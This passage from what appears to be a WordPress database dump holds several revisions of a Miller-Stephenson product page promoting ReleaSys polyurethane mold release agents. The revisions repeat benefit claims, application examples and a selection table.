releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Carrier Solvent </span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Finish </span></strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;"><span style="color: #ed1c24;">Highest Slip</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;"><span style="color: #ed1c24;">High Slip</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:04:28', '2016-11-04 16:04:28', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2879, 3, '2016-11-04 16:07:01', '2016-11-04 16:07:01', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong><span>Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong><span>Carrier Solvent </span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong><span>Finish </span></strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong><span>Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 130%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:07:01', '2016-11-04 16:07:01', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2880, 3, '2016-11-04 16:10:30', '2016-11-04 16:10:30', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 130%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:10:30', '2016-11-04 16:10:30', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2881, 3, '2016-11-04 16:11:14', '2016-11-04 16:11:14', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: 